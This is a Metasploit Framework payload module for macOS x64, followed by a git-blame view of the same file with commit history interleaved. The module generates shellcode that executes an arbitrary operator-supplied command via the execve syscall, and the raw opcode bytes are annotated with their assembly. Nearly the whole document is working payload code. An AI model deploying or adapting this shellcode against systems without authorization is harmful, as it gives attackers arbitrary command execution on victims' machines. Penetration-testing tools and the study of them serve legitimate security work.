metasploit-framework/modules/payloads/singles/osx/x64/exec.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'

module Metasploit3

	include Msf::Payload::Single

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'OS X x64 Execute Command',
			'Description'   => 'Execute an arbitrary command',
			'Author'        => [ 'argp <argp[at]census-labs.com>',
			                     'joev <jvennix[at]rapid7.com>' ],
			'License'       => MSF_LICENSE,
			'Platform'      => 'osx',
			'Arch'          => ARCH_X86_64
		))

		# exec payload options
		register_options([
			OptString.new('CMD',  [ true,  "The command string to execute" ])
		], self.class)
	end

	# build the shellcode payload dynamically based on the user-provided CMD
	def generate
		cmd_str = datastore['CMD'] || ''
		# Split the cmd string into arg chunks
		cmd_parts = Shellwords.shellsplit(cmd_str)
		cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
		call = "\xe8" + [arg_str.length].pack('V')
		payload =
			"\x48\x31\xc0" +                                # xor rax, rax
			call +                                          # call CMD.len
			arg_str  +                                      # CMD
			"\x5f" +                                        # pop rdi
			if cmd_parts.length > 1
				"\x48\x89\xf9" +                            # mov rcx, rdi
				"\x50" +                                    # push null
				# for each arg, push its current memory location on to the stack
				cmd_parts[1..-1].each_with_index.map do |arg, idx|
					"\x48\x81\xc1" +                        # add rcx + ...
					[cmd_parts[idx].length+1].pack('V') +   #
					"\x51"                                  # push rcx (build str array)
				end.join
			else
				"\x50"                                      # push null
			end +
			"\x57"+                                         # push rdi
			"\x48\x89\xe6"+	                                # mov rsi, rsp
			"\x48\xc7\xc0\x3b\x00\x00\x02" +                # mov rax, 0x200003b (execve)
			"\x0f\x05"                                      # syscall
	end
end
Execute (execve) arbitrary command payload for Mac OS X x64 2012-01-30 09:01:57 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Execute (execve) arbitrary command payload for Mac OS X x64 2012-01-30 09:01:57 +00:00			`##`


			`require 'msf/core'`

			`module Metasploit3`

MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`include Msf::Payload::Single`

			`def initialize(info = {})`
			`super(merge_info(info,`
Correct OSX naming. See ticket #7182 2012-08-14 20:29:21 +00:00			`'Name' => 'OS X x64 Execute Command',`
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`'Description' => 'Execute an arbitrary command',`
Rewrite osx x64 cmd payload to accept args. [SeeRM #8260] 2013-07-30 19:40:39 +00:00			`'Author' => [ 'argp <argp[at]census-labs.com>',`
			`'joev <jvennix[at]rapid7.com>' ],`
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`'License' => MSF_LICENSE,`
			`'Platform' => 'osx',`
			`'Arch' => ARCH_X86_64`
			`))`

			`# exec payload options`
Rewrite osx x64 cmd payload to accept args. [SeeRM #8260] 2013-07-30 19:40:39 +00:00			`register_options([`
			`OptString.new('CMD', [ true, "The command string to execute" ])`
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`], self.class)`
			`end`

			`# build the shellcode payload dynamically based on the user-provided CMD`
			`def generate`
Rewrite osx x64 cmd payload to accept args. [SeeRM #8260] 2013-07-30 19:40:39 +00:00			`cmd_str = datastore['CMD'] \|\| ''`
			`# Split the cmd string into arg chunks`
			`cmd_parts = Shellwords.shellsplit(cmd_str)`
			`cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] \|\| []).reverse).compact`
			`arg_str = cmd_parts.map { \|a\| "#{a}\x00" }.join`
			`call = "\xe8" + [arg_str.length].pack('V')`
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`payload =`
			`"\x48\x31\xc0" + # xor rax, rax`
			`call + # call CMD.len`
Rewrite osx x64 cmd payload to accept args. [SeeRM #8260] 2013-07-30 19:40:39 +00:00			`arg_str + # CMD`
			`"\x5f" + # pop rdi`
			`if cmd_parts.length > 1`
			`"\x48\x89\xf9" + # mov rcx, rdi`
			`"\x50" + # push null`
			`# for each arg, push its current memory location on to the stack`
			`cmd_parts[1..-1].each_with_index.map do \|arg, idx\|`
			`"\x48\x81\xc1" + # add rcx + ...`
			`[cmd_parts[idx].length+1].pack('V') + #`
			`"\x51" # push rcx (build str array)`
			`end.join`
			`else`
			`"\x50" # push null`
			`end +`
			`"\x57"+ # push rdi`
			`"\x48\x89\xe6"+ # mov rsi, rsp`
			`"\x48\xc7\xc0\x3b\x00\x00\x02" + # mov rax, 0x200003b (execve)`
MSFTidy commits Whitespace fixes, grammar fixes, and breaking up a multiline SOAP request. Squashed commit of the following: commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:58:53 2012 -0600 Break up the multiline SOAP thing commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:48:16 2012 -0600 More whitespace and indent commit 12c42aa1efdbf633773096418172e60277162e22 Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:39:36 2012 -0600 Whitespace fixes commit 32d57444132fef3306ba2bc42743bfa063e498df Author: Tod Beardsley <todb@metasploit.com> Date: Wed Feb 1 10:35:37 2012 -0600 Grammar fixes for new modules. 2012-02-01 16:59:58 +00:00			`"\x0f\x05" # syscall`
			`end`
Execute (execve) arbitrary command payload for Mac OS X x64 2012-01-30 09:01:57 +00:00			`end`